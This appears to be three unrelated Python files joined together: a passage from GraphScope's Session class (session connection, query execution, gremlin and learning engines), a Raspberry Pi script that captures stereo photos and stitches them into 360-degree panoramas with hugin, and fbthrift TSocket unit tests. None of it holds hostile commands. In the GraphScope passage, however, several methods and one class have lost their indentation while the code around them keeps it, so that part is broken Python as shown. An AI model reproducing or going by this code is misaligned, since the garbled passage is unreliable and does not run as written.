                    instance.close()
            except LearningEngineInternalError:
                pass
        self._learning_instance_dict.clear()
        if self._grpc_client:
            self._grpc_client.close()
            self._grpc_client = None
        _session_dict.pop(self._session_id, None)
        # clean up launched cluster resources — only when this session
        # launched them itself (addr is None means self-launched).
        if self._config_params["addr"] is None:
            if self._launcher:
                self._launcher.stop()
            self._pod_name_list = []
def _close_interactive_instance(self, instance):
"""Close a interactive instance."""
if self._grpc_client:
self._grpc_client.close_interactive_engine(instance.object_id)
self._interactive_instance_dict[instance.object_id] = None
def _close_learning_instance(self, instance):
"""Close a learning instance."""
if self._grpc_client:
self._grpc_client.close_learning_engine(instance.object_id)
self._learning_instance_dict[instance.object_id] = None
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
    def as_default(self):
        """Obtain a context manager that makes this object the default session.
        This method is used when a Session is constructed, which will immediately
        install self as a default session.
        Raises:
            ValueError: If a default session already exists in the current context.
        Returns:
            A context manager using this session as the default session.
        """
        if not _default_session_stack.is_cleared():
            raise ValueError(
                "A default session is already active. You must explicitly call Session.close()."
            )
        # session context manager
        # __enter__ is invoked immediately; the matching __exit__ happens
        # later in _deregister_default() (called from close()).
        self._default_session = default_session(self)
        self._default_session.__enter__()
def _deregister_default(self):
"""Remove self from the default session stack."""
if self._default_session:
self._default_session.__exit__(None, None, None)
self._default_session = None
    def run(self, fetch):
        """Run operations of `fetch`.
        Args:
            fetch: :class:`Operation`
        Raises:
            RuntimeError:
                Client disconnected from the service, or run on a closed session.
            ValueError:
                If fetch is not an instance of :class:`Operation`, or
                the fetch has already been evaluated.
            InvalidArgumentError:
                Not recognized output type.
        Returns:
            Different values for different output types of :class:`Operation`
        """
        # prepare names to run and fetch
        # Accept wrapper objects that carry their Operation in an `op` attribute.
        if hasattr(fetch, "op"):
            fetch = fetch.op
        if not isinstance(fetch, Operation):
            raise ValueError("Expect a `Operation`")
        # A non-None output means the op was already executed once.
        if fetch.output is not None:
            raise ValueError("The op <%s> are evaluated duplicated." % fetch.key)
        # convert to list to be compatible with rpc client method signature
        fetch_ops = [fetch]
        dag = op_def_pb2.DagDef()
        for op in fetch_ops:
            # Deep-copy the op def — presumably so downstream mutation of the
            # submitted DAG cannot affect the local op. TODO confirm.
            dag.op.extend([copy.deepcopy(op.as_op_def())])
        if self._closed:
            raise RuntimeError("Attempted to use a closed Session.")
        if not self._grpc_client:
            raise RuntimeError("Session disconnected.")
        # execute the query
        try:
            response = self._grpc_client.run(dag)
        except FatalError:
            # The service is unrecoverable: release resources, then propagate.
            self.close()
            raise
        check_argument(
            len(fetch_ops) == 1, "Cannot execute multiple ops at the same time"
        )
        return self._parse_value(fetch_ops[0], response)
def _parse_value(self, op, response: message_pb2.RunStepResponse):
# attach an output to op, indicating the op is already run.
op.set_output(response.metrics)
# if loads a arrow property graph, will return {'object_id': xxxx}
if op.output_types == types_pb2.GRAPH:
return response.graph_def
if op.output_types == types_pb2.APP:
return response.result.decode("utf-8")
if op.output_types in (
types_pb2.RESULTS,
types_pb2.VINEYARD_TENSOR,
types_pb2.VINEYARD_DATAFRAME,
):
return response.result.decode("utf-8")
if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
return response.result
else:
raise InvalidArgumentError(
"Not recognized output type: %s" % op.output_types
)
    def _connect(self):
        """Establish the connection to a coordinator.

        Either attaches to an existing coordinator (when ``addr`` is given)
        or launches one on k8s / hosts, then performs the gRPC handshake and
        registers this session in the module-level session registry.
        """
        if self._config_params["addr"] is not None:
            # try connect to exist coordinator
            self._coordinator_endpoint = self._config_params["addr"]
        elif self._cluster_type == types_pb2.K8S:
            if (
                self._config_params["k8s_etcd_image"] is None
                or self._config_params["k8s_gs_image"] is None
            ):
                raise K8sError("None image found.")
            if isinstance(
                self._config_params["k8s_client_config"],
                kube_client.api_client.ApiClient,
            ):
                # Caller supplied a ready-made kubernetes API client.
                api_client = self._config_params["k8s_client_config"]
            else:
                # Otherwise treat the value as kwargs for kube config loading.
                api_client = kube_config.new_client_from_config(
                    **self._config_params["k8s_client_config"]
                )
            self._launcher = KubernetesClusterLauncher(
                api_client=api_client,
                **self._config_params,
            )
        elif (
            self._cluster_type == types_pb2.HOSTS
            and isinstance(self._config_params["hosts"], list)
            and len(self._config_params["hosts"]) != 0
            and self._config_params["num_workers"] > 0
        ):
            # launch coordinator with hosts
            self._launcher = HostsClusterLauncher(
                **self._config_params,
            )
        else:
            raise RuntimeError("Session initialize failed.")
        # launching graphscope service
        if self._launcher is not None:
            self._launcher.start()
            self._coordinator_endpoint = self._launcher.coordinator_endpoint
        # waiting service ready
        self._grpc_client = GRPCClient(self._coordinator_endpoint)
        self._grpc_client.waiting_service_ready(
            timeout_seconds=self._config_params["timeout_seconds"],
        )
        # connect and fetch logs from rpc server
        try:
            (
                self._session_id,
                self._cluster_type,
                self._engine_config,
                self._pod_name_list,
                self._config_params["num_workers"],
                self._config_params["k8s_namespace"],
            ) = self._grpc_client.connect(
                # Only auto-clean the cluster when this session launched it.
                cleanup_instance=not bool(self._config_params["addr"]),
                dangling_timeout_seconds=self._config_params[
                    "dangling_timeout_seconds"
                ],
            )
            # fetch logs
            if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
                self._grpc_client.fetch_logs()
            _session_dict[self._session_id] = self
        except Exception:
            # Handshake failed: release any cluster we may have launched.
            self.close()
            raise
    def get_config(self):
        """Get configuration of the session.

        Returns:
            dict: The raw (mutable) parameter dict backing this session.
        """
        return self._config_params
    def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
        """Construct a :class:`Graph` bound to this session.

        Args:
            incoming_data: Optional initial data to build the graph from.
            oid_type (str): Type of the vertex original ids, defaults to "int64".
            directed (bool): Whether the graph is directed.
            generate_eid (bool): Whether to generate edge ids automatically.

        Returns:
            :class:`Graph`: A new (initially empty unless data given) graph.
        """
        return Graph(self, incoming_data, oid_type, directed, generate_eid)
    def load_from(self, *args, **kwargs):
        """Load a graph within the session.
        See more information in :meth:`graphscope.load_from`.
        """
        # Temporarily install self as the default session for the loader.
        with default_session(self):
            return graphscope.load_from(*args, **kwargs)
def _run_on_local(self):
self._config_params["hosts"] = ["localhost"]
self._config_params["port"] = None
self._config_params["vineyard_socket"] = ""
    def _get_gl_handle(self, graph):
        """Dump a handler for GraphLearn for interaction.
        Fields in :code:`schema` are:
        + the name of node type or edge type
        + whether the graph is weighted graph
        + whether the graph is labeled graph
        + the number of int attributes
        + the number of float attributes
        + the number of string attributes
        An example of the graph handle:
        .. code:: python
            {
                "server": "127.0.0.1:8888,127.0.0.1:8889",
                "client_count": 1,
                "vineyard_socket": "/var/run/vineyard.sock",
                "vineyard_id": 13278328736,
                "node_schema": [
                    "user:false:false:10:0:0",
                    "item:true:false:0:0:5"
                ],
                "edge_schema": [
                    "user:click:item:true:false:0:0:0",
                    "user:buy:item:true:true:0:0:0",
                    "item:similar:item:false:false:10:0:0"
                ],
                "node_attribute_types": {
                    "person": {
                        "age": "i",
                        "name": "s",
                    },
                },
                "edge_attribute_types": {
                    "knows": {
                        "weight": "f",
                    },
                },
            }
        The handle can be decoded using:
        .. code:: python
            base64.b64decode(handle.encode('ascii')).decode('ascii')
        Note that the ports are selected from a range :code:`(8000, 9000)`.
        Args:
            graph (:class:`Graph`): A Property Graph.
        Returns:
            str: Base64 encoded handle
        Raises:
            InvalidArgumentError: If the graph is not loaded, or graph_type isn't
                `ARROW_PROPERTY`.
        """
        if not graph.loaded():
            raise InvalidArgumentError("The graph has already been unloaded")
        if not graph.graph_type == types_pb2.ARROW_PROPERTY:
            raise InvalidArgumentError("The graph should be a property graph.")
        def group_property_types(props):
            # Classify a label's properties into string / float / int counts
            # and build the per-property type-code map ("s"/"f"/"i").
            weighted, labeled, i, f, s, attr_types = "false", "false", 0, 0, 0, {}
            for prop in props:
                if prop.type in [types_pb2.STRING]:
                    s += 1
                    attr_types[prop.name] = "s"
                elif prop.type in (types_pb2.FLOAT, types_pb2.DOUBLE):
                    f += 1
                    attr_types[prop.name] = "f"
                else:
                    # Everything else is treated as an integer attribute.
                    i += 1
                    attr_types[prop.name] = "i"
                # Presence of "weight"/"label" properties flags the graph as
                # weighted/labeled — string flags as GraphLearn expects.
                if prop.name == "weight":
                    weighted = "true"
                elif prop.name == "label":
                    labeled = "true"
            return weighted, labeled, i, f, s, attr_types
        node_schema, node_attribute_types = [], dict()
        for label in graph.schema.vertex_labels:
            weighted, labeled, i, f, s, attr_types = group_property_types(
                graph.schema.get_vertex_properties(label)
            )
            node_schema.append(
                "{}:{}:{}:{}:{}:{}".format(label, weighted, labeled, i, f, s)
            )
            node_attribute_types[label] = attr_types
        edge_schema, edge_attribute_types = [], dict()
        for label in graph.schema.edge_labels:
            weighted, labeled, i, f, s, attr_types = group_property_types(
                graph.schema.get_edge_properties(label)
            )
            # One schema entry per (src label, edge label, dst label) triple.
            for rel in graph.schema.get_relationships(label):
                edge_schema.append(
                    "{}:{}:{}:{}:{}:{}:{}:{}".format(
                        rel[0], label, rel[1], weighted, labeled, i, f, s
                    )
                )
            edge_attribute_types[label] = attr_types
        handle = {
            "hosts": self.info["engine_hosts"],
            "client_count": 1,
            "vineyard_id": graph.vineyard_id,
            "vineyard_socket": self._engine_config["vineyard_socket"],
            "node_schema": node_schema,
            "edge_schema": edge_schema,
            "node_attribute_types": node_attribute_types,
            "edge_attribute_types": edge_attribute_types,
        }
        handle_json_string = json.dumps(handle)
        return base64.b64encode(handle_json_string.encode("utf-8")).decode("utf-8")
    @set_defaults(gs_config)
    def gremlin(self, graph, engine_params=None):
        """Get an interactive engine handler to execute gremlin queries.
        Note that this method will be executed implicitly when a property graph created
        and cache an instance of InteractiveQuery in session if `initializing_interactive_engine`
        is True. If you want to create a new instance under the same graph by different params,
        you should close the instance first.
        .. code:: python
            >>> # close and recreate InteractiveQuery.
            >>> interactive_query = sess.gremlin(g)
            >>> interactive_query.close()
            >>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})
        Args:
            graph (:class:`Graph`): Use the graph to create interactive instance.
            engine_params (dict, optional): Configure startup parameters of interactive engine.
                You can also configure this param by `graphscope.set_option(engine_params={})`.
                See a list of configurable keys in
                `interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`
        Raises:
            InvalidArgumentError: :code:`graph` is not a property graph or unloaded.
        Returns:
            :class:`InteractiveQuery`
        """
        # self._interactive_instance_dict[graph.vineyard_id] will be None if
        # InteractiveQuery closed
        if (
            graph.vineyard_id in self._interactive_instance_dict
            and self._interactive_instance_dict[graph.vineyard_id] is not None
        ):
            interactive_query = self._interactive_instance_dict[graph.vineyard_id]
            if interactive_query.status == InteractiveQueryStatus.Running:
                return interactive_query
            elif interactive_query.status == InteractiveQueryStatus.Failed:
                raise InteractiveEngineInternalError(interactive_query.error_msg)
            else:
                # Initializing.
                # while True is ok, as the status is either running or failed eventually after timeout.
                # Poll once per second until another caller's creation settles.
                while True:
                    time.sleep(1)
                    if interactive_query.status == InteractiveQueryStatus.Running:
                        return interactive_query
                    elif interactive_query.status == InteractiveQueryStatus.Failed:
                        raise InteractiveEngineInternalError(
                            interactive_query.error_msg
                        )
        if not graph.loaded():
            raise InvalidArgumentError("The graph has already been unloaded")
        if not graph.graph_type == types_pb2.ARROW_PROPERTY:
            raise InvalidArgumentError("The graph should be a property graph.")
        interactive_query = InteractiveQuery(session=self, object_id=graph.vineyard_id)
        # Register eagerly (status=Initializing) so concurrent callers wait above.
        self._interactive_instance_dict[graph.vineyard_id] = interactive_query
        if engine_params is not None:
            # The engine expects string keys and values.
            engine_params = {
                str(key): str(value) for key, value in engine_params.items()
            }
        else:
            engine_params = {}
        try:
            response = self._grpc_client.create_interactive_engine(
                object_id=graph.vineyard_id,
                schema_path=graph.schema_path,
                gremlin_server_cpu=gs_config.k8s_gie_gremlin_server_cpu,
                gremlin_server_mem=gs_config.k8s_gie_gremlin_server_mem,
                engine_params=engine_params,
            )
        except Exception as e:
            # Record the failure on the cached entry so waiters see it too.
            interactive_query.status = InteractiveQueryStatus.Failed
            interactive_query.error_msg = str(e)
            raise InteractiveEngineInternalError(str(e)) from e
        else:
            interactive_query.set_frontend(
                front_ip=response.frontend_host, front_port=response.frontend_port
            )
            interactive_query.status = InteractiveQueryStatus.Running
            graph._attach_interactive_instance(interactive_query)
        return interactive_query
    def learning(self, graph, nodes=None, edges=None, gen_labels=None):
        """Start a graph learning engine.
        Args:
            graph (:class:`Graph`): The property graph to train on.
            nodes (list): The node types that will be used for gnn training.
            edges (list): The edge types that will be used for gnn training.
            gen_labels (list): Extra node and edge labels on original graph for gnn training.
        Raises:
            RuntimeError: On non-Linux platforms.
            InvalidArgumentError: If the graph is unloaded or not a property graph.
        Returns:
            `graphscope.learning.Graph`: An instance of `graphscope.learning.Graph`
            that could be feed to the learning engine.
        """
        # Reuse a live learning instance for the same graph if one exists.
        if (
            graph.vineyard_id in self._learning_instance_dict
            and self._learning_instance_dict[graph.vineyard_id] is not None
        ):
            return self._learning_instance_dict[graph.vineyard_id]
        if sys.platform != "linux" and sys.platform != "linux2":
            raise RuntimeError(
                "The learning engine currently supports Linux only, doesn't support %s"
                % sys.platform
            )
        if not graph.loaded():
            raise InvalidArgumentError("The graph has already been unloaded")
        if not graph.graph_type == types_pb2.ARROW_PROPERTY:
            raise InvalidArgumentError("The graph should be a property graph.")
        # Local import — presumably to avoid importing learning dependencies
        # for sessions that never use the learning engine. TODO confirm.
        from graphscope.learning.graph import Graph as LearningGraph
        handle = self._get_gl_handle(graph)
        config = LearningGraph.preprocess_args(handle, nodes, edges, gen_labels)
        config = base64.b64encode(json.dumps(config).encode("utf-8")).decode("utf-8")
        endpoints = self._grpc_client.create_learning_engine(
            graph.vineyard_id, handle, config
        )
        # Re-decode the handle to patch in the live server endpoints.
        handle = json.loads(base64.b64decode(handle.encode("utf-8")).decode("utf-8"))
        handle["server"] = endpoints
        handle["client_count"] = 1
        learning_graph = LearningGraph(handle, config, graph.vineyard_id, self)
        self._learning_instance_dict[graph.vineyard_id] = learning_graph
        graph._attach_learning_instance(learning_graph)
        return learning_graph
# Lowercase alias so callers can write ``graphscope.session(...)``.
session = Session
def set_option(**kwargs):
    """Assign new values to one or more global GraphScope options.

    Every option is an attribute of the module-level ``gs_config`` object.
    The available keys include: num_workers, log_level, show_log,
    vineyard_shared_mem, k8s_namespace, k8s_service_type, k8s_gs_image,
    k8s_etcd_image, k8s_gie_graph_manager_image, k8s_zookeeper_image,
    k8s_image_pull_policy, k8s_image_pull_secrets, k8s_coordinator_cpu,
    k8s_coordinator_mem, k8s_vineyard_daemonset, k8s_vineyard_cpu,
    k8s_vineyard_mem, k8s_engine_cpu, k8s_engine_mem, k8s_mars_worker_cpu,
    k8s_mars_worker_mem, k8s_mars_scheduler_cpu, k8s_mars_scheduler_mem,
    with_mars, k8s_waiting_for_delete, engine_params,
    initializing_interactive_engine, timeout_seconds.

    Args:
        kwargs: dict
            Key-value pairs of GraphScope config you want to set.

    Raises:
        ValueError: If no such option exists; in that case no option
            is modified.

    Returns: None
    """
    # Validate every key up-front so a bad key leaves the config untouched.
    for key in kwargs:
        if not hasattr(gs_config, key):
            raise ValueError("No such option {} exists.".format(key))
    for key, value in kwargs.items():
        setattr(gs_config, key, value)
    GSLogger.update()
def get_option(key):
    """Look up the current value of a global GraphScope option.

    Every option is an attribute of the module-level ``gs_config`` object;
    see :func:`set_option` for the full list of option names (num_workers,
    log_level, show_log, vineyard_shared_mem, k8s_namespace,
    k8s_service_type, k8s_gs_image, k8s_etcd_image,
    k8s_gie_graph_manager_image, k8s_zookeeper_image, k8s_image_pull_policy,
    k8s_image_pull_secrets, k8s_coordinator_cpu, k8s_coordinator_mem,
    k8s_vineyard_daemonset, k8s_vineyard_cpu, k8s_vineyard_mem,
    k8s_engine_cpu, k8s_engine_mem, k8s_mars_worker_cpu,
    k8s_mars_worker_mem, k8s_mars_scheduler_cpu, k8s_mars_scheduler_mem,
    with_mars, k8s_waiting_for_delete, engine_params,
    initializing_interactive_engine, timeout_seconds).

    Args:
        key: str
            Key of GraphScope config you want to get.

    Raises:
        ValueError: If no such option exists.

    Returns: result: the value of the option
    """
    if not hasattr(gs_config, key):
        raise ValueError("No such option {} exists.".format(key))
    return getattr(gs_config, key)
def default_session(session):
    """Python's :code:`with` handler for defining a default session.
    This function provides a means of registering a session so that code
    which needs a default session can find it.
    Use the :code:`with` keyword to specify that invocations within
    the scope of a block should be executed by a particular session.
    Args:
        session: :class:`Session`
            The session to be installed as the default session.
    Returns:
        A context manager for the default session.
    """
    return _default_session_stack.get_controller(session)
def get_default_session():
    """Returns the default session for the current context.
    Raises:
        RuntimeError: If no default session exists.
    Returns:
        The default :class:`Session`.
    """
    return _default_session_stack.get_default()
def get_session_by_id(handle):
    """Return the session registered under *handle*.

    Args:
        handle: A session id previously assigned at connect time.

    Raises:
        ValueError: If no session with the given handle exists.

    Returns:
        :class:`Session`: The matching live session.
    """
    try:
        # Single lookup instead of a membership test followed by a get —
        # avoids the double hash and a check/read race between them.
        return _session_dict[handle]
    except KeyError:
        raise ValueError("Session not exists.") from None
class _DefaultSessionStack(object):
"""A stack of objects for providing implicit defaults."""
def __init__(self):
super().__init__()
self.stack = []
def get_default(self):
if not self.stack:
raise RuntimeError("No default session found.")
return self.stack[-1]
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
self.stack.remove(default)
# Module-wide singleton holding the implicit default-session stack.
_default_session_stack = _DefaultSessionStack()  # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
    """Construct a :class:`Graph` using the current default session.

    Equivalent to ``get_default_session().g(...)``; see :meth:`Session.g`.
    Raises ``RuntimeError`` if no default session is active.
    """
    return get_default_session().g(incoming_data, oid_type, directed, generate_eid)
|
take360.py | #!/usr/bin/env python
import os
import io
import time
import sys
from skimage import io
import signal
import struct
import subprocess
import threading
import numpy as np
import argparse
################################################################
# Initialise the Raspberry Pi video
################################################################
################################################################
# Either run the following command before running the script:
# sudo modprobe bcm2835-v4l2
# or add bcm2835-v4l2 to the /etc/modules file
################################################################
################################################################
# Image Parameters
################################################################
# Still resolution of a single sensor; raspistill is invoked at twice this
# width to capture the side-by-side stereo frame.
width = 2592
height = 1944
img_size = (width,height)
# Flag flipped by the SIGINT handler; polled by the main wait loop.
terminate = False
def signal_handling(signum,frame):
    """SIGINT handler: ask the main wait loop to shut down gracefully."""
    global terminate
    terminate = True
###############################################################
class Take360(threading.Thread):
    """Capture thread: shoots side-by-side stereo stills with ``raspistill``
    into ``input_directory``, either once or as a timelapse.

    NOTE(review): ``start()`` spawns a fresh ``threading.Thread`` around
    :meth:`update` instead of using the inherited Thread machinery, so
    ``join()`` on this object will not wait for the worker.
    """

    def __init__(self, input_directory, start_delay, timelapse_enabled, timelapse_period, timelapse_seconds):
        # Initialise the Thread base class (previously skipped).
        super().__init__()
        self.input_directory = input_directory  # Directory in which to save images
        self.start_delay = start_delay  # Delay before taking pictures
        self.timelapse_enabled = timelapse_enabled  # Enable the timelapse function
        self.timelapse_period = timelapse_period  # If timelapse enabled, the time gap between shots
        self.timelapse_seconds = timelapse_seconds  # If timelapse enabled, how long should it shoot for
        # Renamed from `_stop`: that attribute shadowed the private
        # threading.Thread._stop() method, breaking Thread internals.
        self._stop_event = threading.Event()
        print("Take360 Capture Initialisation Complete")

    def start(self):
        """Spawn the capture worker; returns self so callers can chain."""
        threading.Thread(target=self.update, args=()).start()
        return self

    def update(self):
        """Worker loop: wait start_delay, then capture until done/stopped."""
        print("Take360 Capture Starting")
        # keep looping infinitely until the thread is stopped
        print("Take360 Waiting for capture thread to start")
        time.sleep(self.start_delay)
        # Image counter used to name output files; defined unconditionally so
        # single-shot (non-timelapse) mode can use it too.
        counter = 0
        if self.timelapse_enabled:
            # Calculate the number of images
            image_count = int(self.timelapse_seconds / self.timelapse_period)
        print("Take360 Starting Capture Loop")
        while True:
            try:
                if self.stopped():
                    return
                # PiCamera wouldn't produce the full size image, so shell out
                # to raspistill for a side-by-side (sbs) stereo capture.
                subprocess.run(["raspistill", "-3d", "sbs", "-o", self.input_directory+'{:07d}'.format(counter)+".jpg", "-w", str(width*2), "-h", str(height) ])
                print("Capture "+'{:07d}'.format(counter))
                counter += 1
                # If timelapse
                if self.timelapse_enabled:
                    # Has the timelapse finished?
                    if counter >= image_count:
                        print("Capture completed")
                        print("Press Ctrl+c to exit.")
                        self.stop()
                    else:
                        time.sleep(self.timelapse_period)
                else:
                    # Single-shot mode: exit after the first capture.
                    self.stop()
            except KeyboardInterrupt as ki:
                print("Take360 Capture Exiting Loop")
                raise ki

    def stop(self):
        """Request the worker loop to exit at its next check."""
        self._stop_event.set()

    def stopped(self):
        """True once stop() has been requested."""
        # is_set() replaces the deprecated camelCase isSet() alias.
        return self._stop_event.is_set()
################################################################
###############################################################
class Process360(threading.Thread):
    """Processing thread: stitches captured side-by-side stereo JPEGs into
    360-degree panoramas using the hugin command-line tools.

    NOTE(review): like ``Take360``, ``start()`` spawns its own Thread around
    :meth:`update`, so inherited Thread features (``join`` etc.) do not apply.
    """

    def __init__(self, input_directory, output_directory):
        # Initialise the Thread base class (previously skipped).
        super().__init__()
        self.input_directory = input_directory  # Directory to look for images to process
        self.output_directory = output_directory  # directory to place processed images
        # Renamed from `_stop`: that attribute shadowed the private
        # threading.Thread._stop() method, breaking Thread internals.
        self._stop_event = threading.Event()
        print("Take360 Process Loop Initialisation Complete")

    def start(self):
        """Spawn the processing worker; returns self so callers can chain."""
        threading.Thread(target=self.update, args=()).start()
        return self

    def update(self):
        """Worker loop: stitch every ``*.jpg`` found in the input directory."""
        print("Take360 Process Loop Starting")
        # keep looping infinitely until the thread is stopped
        while True:
            files = os.listdir(self.input_directory)
            try:
                if self.stopped():
                    return
                for file in files:
                    if file.endswith(".jpg"):
                        # (removed a dead np.empty allocation that was
                        # immediately overwritten by the imread result)
                        image = io.imread(self.input_directory+file)
                        if image is not None:
                            # Split the side-by-side frame into left/right eyes.
                            image0 = image[0:height,0:width-1]
                            image1 = image[0:height,width:width*2-1]
                            # Create the tmp directory and save the images to it
                            if not os.path.isdir("./tmp/"):
                                os.mkdir("./tmp/")
                            io.imsave("./tmp/image0.jpg",image0)
                            io.imsave("./tmp/image1.jpg",image1)
                            # Create the hugin project file if it doesn't already exist
                            if not os.path.exists("project.pto"):
                                subprocess.run(["pto_gen", "--projection=2", "--fov=360", "-o", "project.pto", "./tmp/image0.jpg", "./tmp/image1.jpg" ])
                                subprocess.run(["pto_template", "--output=project.pto", "--template=stereopi-template.pto", "project.pto"])
                            # Process the images into a 360 degree panorama using hugin-tools
                            subprocess.run(["hugin_executor", "--stitching", "--prefix=output", "project.pto"])
                            # Move the output to the processed files folder and rename it
                            os.rename("output.jpg",self.output_directory+file)
                            # Clean up the tmp folder and delete it
                            os.remove("./tmp/image0.jpg")
                            os.remove("./tmp/image1.jpg")
                            os.rmdir("./tmp/")
                            # The file is processed so move it to the processed folder
                            os.rename(self.input_directory+file,self.input_directory+"processed/"+file)
                print("Take360 Process Loop waiting for file to process.")
                print("Press Ctrl+c to exit.")
                time.sleep(0)
            except KeyboardInterrupt as ki:
                print("Exiting Take360 Process Loop")
                raise ki

    def stop(self):
        """Request the worker loop to exit at its next check."""
        self._stop_event.set()

    def stopped(self):
        """True once stop() has been requested."""
        # is_set() replaces the deprecated camelCase isSet() alias.
        return self._stop_event.is_set()
################################################################
def main(args):
    """CLI entry point: parse options, start the capture and/or processing
    threads, then idle until SIGINT requests shutdown.

    Args:
        args: argv-style list, kept for call compatibility only — the name
            is rebound below by ``parser.parse_args()`` (which reads
            ``sys.argv`` itself).
    """
    # A single tuple comparison checks major AND minor together; the previous
    # `major < 3 or (major and minor < 5)` form wrongly rejected any future
    # major release whose minor was < 5 (e.g. 4.0).
    if sys.version_info < (3, 5):
        raise Exception("Must be using Python 3.5 or higher")
    # initialise
    # Capture CTRL+C
    signal.signal(signal.SIGINT,signal_handling)
    # See if there's any command line arguments to process
    parser = argparse.ArgumentParser()
    parser.add_argument('-i','--input_dir', nargs=1, type=str, required=True, help='Directory to place shots into. Shots will be moved into a subfolder called processed after processing.')
    parser.add_argument('-o','--output_dir', nargs=1, type=str, required=True, help='Directory for processed images to be placed into.')
    parser.add_argument('-d','--start_delay', nargs=1, type=int, required=False, default=[0], help='Delay before shooting starts.')
    parser.add_argument('-t','--timelapse', required=False, action='store_true', help='Enable timelapse mode.')
    parser.add_argument('-p','--period', nargs=1, type=int, required=False, default=[2], help='Seconds between shots (minimum of 2 seconds).')
    parser.add_argument('-s','--seconds', nargs=1, type=int, required=False, default=[0], help='Number of seconds to shoot timelapse.')
    parser.add_argument('--no_capture', required=False, action='store_true', help='Capture images disabled. Can be disabled to run shooting and processing seperately.')
    parser.add_argument('--no_process', required=False, action='store_true', help='Process images disabled. Can be disabled to run shooting and processing seperately.')
    args = parser.parse_args()
    input_directory = args.input_dir[0]       # Directory to place shots into
    output_directory = args.output_dir[0]     # Directory for processed images
    start_delay = int(args.start_delay[0])    # Delay before shooting starts
    timelapse_enabled = bool(args.timelapse)  # Enable timelapse mode
    timelapse_period = int(args.period[0])    # Seconds between shots
    timelapse_seconds = int(args.seconds[0])  # Number of seconds to shoot timelapse
    no_capture = bool(args.no_capture)        # Skip starting the capture thread
    no_processing = bool(args.no_process)     # Skip starting the processing thread
    if timelapse_enabled:
        if timelapse_period >= timelapse_seconds:
            print("Timelpase period must be less than Timelapse seconds")
            os._exit(1)
    # Make sure the directory names end in /
    if not input_directory.endswith("/"):
        input_directory += "/"
    if not output_directory.endswith("/"):
        output_directory += "/"
    # Create any directories we need
    if not os.path.isdir(input_directory):
        os.mkdir(input_directory)
    if not os.path.isdir(input_directory+"processed/"):
        os.mkdir(input_directory+"processed/")
    if not os.path.isdir(output_directory):
        os.mkdir(output_directory)
    if not no_processing:
        print("Start the processing thread")
        process = Process360(input_directory, output_directory).start()
    if not no_capture:
        print("Start the capture thread")
        capture = Take360(input_directory, start_delay, timelapse_enabled, timelapse_period, timelapse_seconds).start()
    # Idle until the SIGINT handler flips `terminate`.
    while not terminate:
        time.sleep(1)
    print("Stopping")
    if not no_capture:
        print("Closing Take360 Capture Loop")
        capture.stop()
    if not no_processing:
        print("Closing Take360 Process Loop")
        process.stop()
    print("Stopped")
    # Hard exit: the worker threads may be blocked inside subprocess calls;
    # os._exit avoids waiting on them.
    os._exit(0)
if __name__ == '__main__':
    # Run only when executed as a script; argv is passed for signature only
    # (main() re-parses sys.argv with argparse).
    main(sys.argv)
################################################################
|
TSocketTest.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import socket
import tempfile
import threading
import time
import unittest
import nebula2.fbthrift.transport.TSocket as TSocket
import nebula2.fbthrift.transport.TTransport as TTransport
class TSocketTest(unittest.TestCase):
def test_usage_as_context_manager(self):
"""
Asserts that both TSocket and TServerSocket can be used with `with` and
that their resources are disposed of at the close of the `with`.
"""
text = b"hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
self.assertFalse(conn.isOpen())
with server.accept() as client:
read = client.read(len(text))
self.assertFalse(conn.isOpen())
self.assertFalse(server.isListening())
self.assertEquals(read, text)
def test_server_context_errors(self):
# Make sure the TServerSocket context manager doesn't
# swallow exceptions
def do_test():
with TSocket.TServerSocket(port=0, family=socket.AF_INET6):
raise Exception('test_error')
self.assertRaisesRegexp(Exception, 'test_error', do_test)
def test_open_failure(self):
# Bind a server socket to an address, but don't actually listen on it.
server_socket = socket.socket(socket.AF_INET6)
try:
server_socket.bind(('::', 0))
server_port = server_socket.getsockname()[1]
# Explicitly use "localhost" as the hostname, so that the
# connect code will try both IPv6 and IPv4. We want to
# exercise the failure behavior when trying multiple addresses.
sock = TSocket.TSocket(host='localhost', port=server_port)
sock.setTimeout(50) # ms
try:
sock.open()
self.fail('unexpectedly succeeded to connect to closed socket')
except TTransport.TTransportException:
# sock.open() should not leave the file descriptor open
# when it fails
self.assertEquals(None, sock.handle)
self.assertEquals({}, sock.handles)
# Calling close() again on the socket should be a no-op,
# and shouldn't throw an error
sock.close()
finally:
server_socket.close()
def test_poller_process(self):
    """Pollers must not fail when given None as the timeout."""
    # NOTE(review): unlike the sibling tests, `text` is a str rather than
    # b"hi" -- presumably conn.write() accepts both; confirm on py3.
    text = "hi"  # sample text to send over the wire
    with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
        addr = server.getSocketNames()[0]

        def write_data():
            # delay writing to verify that poller.process is waiting
            time.sleep(1)
            with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
                conn.write(text)

        poller = TSocket.ConnectionSelect()
        thread = threading.Thread(target=write_data)
        thread.start()
        # Register every listening fd with the poller before blocking.
        for filenos in server.handles.keys():
            poller.read(filenos)
        # timeout=None means "block until some fd becomes readable".
        r, _, x = poller.process(timeout=None)
        thread.join()
        # Verify that r is non-empty
        self.assertTrue(r)
